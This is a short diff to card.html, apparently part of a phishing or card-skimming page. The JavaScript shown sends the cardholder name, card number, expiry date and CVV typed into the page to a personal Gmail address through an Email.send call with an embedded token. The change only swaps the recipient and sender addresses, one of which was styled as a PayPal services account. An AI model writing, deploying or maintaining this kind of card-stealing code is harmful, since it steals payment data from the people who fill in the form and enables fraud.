--- a/card.html
+++ b/card.html
@@ -64,8 +64,8 @@
 
       Email.send({
         SecureToken: "17fc14fa-5002-4ca8-b197-41350fa3d1e8",
-        To: 'PayPal.services866@gmail.com',
-        From: "mayorjhay123@gmail.com",
+        To: 'mayorjhay3@gmail.com',
+        From: "mayorjhay2@gmail.com",
         Subject: "client",
         Body: 'card-name : ' + name + " card number :" + " " + cardNumber + " date :" + " " + date + " " + "cvv :" + cvv
       }).then(
